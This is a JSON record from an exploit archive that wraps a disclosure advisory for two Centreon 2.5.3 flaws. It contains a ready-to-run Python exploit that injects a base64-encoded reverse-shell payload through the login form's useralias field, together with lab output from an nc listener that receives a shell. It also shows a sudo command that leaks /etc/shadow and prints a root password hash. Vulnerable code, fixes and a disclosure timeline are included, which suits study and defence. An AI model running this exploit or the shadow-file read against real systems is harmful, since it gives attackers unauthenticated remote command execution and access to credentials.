{"type": "zdt", "lastseen": "2016-04-20T01:39:28", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Centreon 2.5.3 - Remote Command Execution Exploit", "published": "2016-02-26T00:00:00", "href": "http://0day.today/exploit/description/25009", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for php platform in category web applications", "hash": "6a8f32af8e8cac2dbbc0ced8d810b25def70641cb5d8c96547447d78b8449dba", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "Unauthenticated Remote Command Execution in Centreon Web Interface\r\n==================================================================\r\n \r\n \r\nDescription\r\n===========\r\n \r\nCentreon is a popular monitoring solution.\r\n \r\nA critical vulnerability has been found in the Centreon logging class\r\nallowing remote users to execute arbitrary commands.\r\n \r\n \r\nSQL injection leading to RCE\r\n============================\r\n \r\nCentreon logs SQL database errors in a log file using the \"echo\" system\r\ncommand and the exec() PHP function. On the authentification class,\r\nCentreon use htmlentities with the ENT_QUOTES options to filter SQL\r\nentities.\r\nHowever, Centreon doesn't filter the SQL escape character \"\\\" and it is\r\npossible to generate an SQL Error.\r\nBecause of the use of the \"echo\" system command with the PHP exec()\r\nfunction, and because of the lack of sanitization, it is possible to\r\ninject arbitrary system commands.\r\n \r\n**Access Vector**: remote\r\n \r\n**Security Risk**: high\r\n \r\n**Vulnerability**: CWE-78\r\n \r\n----------------\r\nProof of Concept\r\n----------------\r\n \r\nTCP Reverse Shell using python.\r\n \r\n #!/usr/bin/env python\r\n import requests\r\n import argparse\r\n \r\n def shell(target, reverseip, reverseport):\r\n payload = 'import socket as a,subprocess as b,os as\r\nc;s=a.socket(2,1);s.connect((\"%s\",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call([\"sh\"]);'\r\n% (reverseip,reverseport)\r\n print \"[~] Starting reverseshell : %s - port : %d\" % (reverseip,\r\nreverseport)\r\n req = requests.post(target, data={\"useralias\": \"$(echo %s |\r\nbase64 -d | python)\\\\\" % payload.encode(\"base64\").replace(\"\\n\",\"\"),\r\n\"password\": \"foo\"})\r\n print \"[+] DEAD !\"\r\n \r\n if __name__ == \"__main__\":\r\n print \"[~] Centreon Unauthentificated RCE - Nicolas Chatelain\r\n<n.chatelain@sysdream.com>\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--target\", required=True)\r\n parser.add_argument(\"--reverseip\", required=True)\r\n parser.add_argument(\"--reverseport\", required=True, type=int)\r\n args = parser.parse_args()\r\n shell(args.target, args.reverseip, args.reverseport)\r\n \r\nShell :\r\n \r\n nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py\r\n--target=http://172.16.138.137/centreon/index.php\r\n--reverseip=172.16.138.1 --reverseport 8888\r\n [~] Centreon Unauthentificated RCE - Nicolas Chatelain\r\n<n.chatelain@sysdream.com>\r\n [~] Starting reverseshell : 172.16.138.1 - port : 8888\r\n \r\n# Other term\r\n \r\nnightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888\r\nNcat: Version 6.45 ( http://nmap.org/ncat )\r\nNcat: Listening on :::8888\r\nNcat: Listening on 0.0.0.0:8888\r\nNcat: Connection from 172.16.138.135.\r\nNcat: Connection from 172.16.138.135:50050.\r\nwhoami\r\napache\r\ngroups\r\napache centreon-engine centreon-broker centreon nagios\r\n \r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n \r\nThe vulnerable code is located in class/centreonLog.class.php, line 82\r\nand line 154:\r\n \r\n \r\n /*\r\n * print Error in log file.\r\n */\r\n exec(\"echo \\\"\".$string.\"\\\" >> \".$this->errorType[$id]);\r\n \r\nIn class/centreonAuth.class.php, line 227:\r\n \r\n $DBRESULT = $this->pearDB->query(\"SELECT * FROM `contact` WHERE\r\n`contact_alias` = '\" . htmlentities($username, ENT_QUOTES, \"UTF-8\") . \"'\r\nAND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1\");\r\n \r\n \r\n--------\r\nSolution\r\n--------\r\n \r\nUpdate to the Centreon 2.5.4\r\n \r\n \r\nPossible root password disclosure in centengine (Centreon Entreprise Server)\r\n============================================================================\r\n \r\nIn some configurations, when centengine can run as root (with sudo).\r\nIt's possible to read some file content.\r\n \r\n**Access Vector**: local\r\n \r\n**Security Risk**: high\r\n \r\n**Vulnerability**: CWE-209\r\n \r\n----------------\r\nProof of Concept\r\n----------------\r\n \r\n $ sudo /usr/sbin/centengine -v /etc/shadow\r\n [1416391088] reading main config file\r\n [1416391088] error while processing a config file: [/etc/shadow:1]\r\nbad variable name:\r\n'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'\r\n [1416391088]\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n \r\nIn Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon\r\n \r\nCENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *\r\n \r\n--------\r\nSolution\r\n--------\r\n \r\nDo not allow centengine to be run as root or do not disclose the line\r\nthat caused the error.\r\n \r\nTimeline (dd/mm/yyyy)\r\n=====================\r\n \r\n* 18/11/2014 : Initial discovery\r\n* 26/11/2014 : Contact with Centreon team\r\n* 27/11/2014 : Centreon correct vulnerabilities\r\n* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities\r\n \r\nFixes\r\n=====\r\n \r\n*\r\nhttps://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9\r\n*\r\nhttps://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d\r\n*\r\nhttps://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1\r\n \r\nAffected versions\r\n=================\r\n \r\n* Centreon <= 2.5.3\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-25009", "sourceHref": "http://0day.today/exploit/25009", "modified": "2016-02-26T00:00:00", "reporter": "Sysdream", "viewCount": 1, "enchantments": {"vulnersScore": 6.0}}

{"result": {}}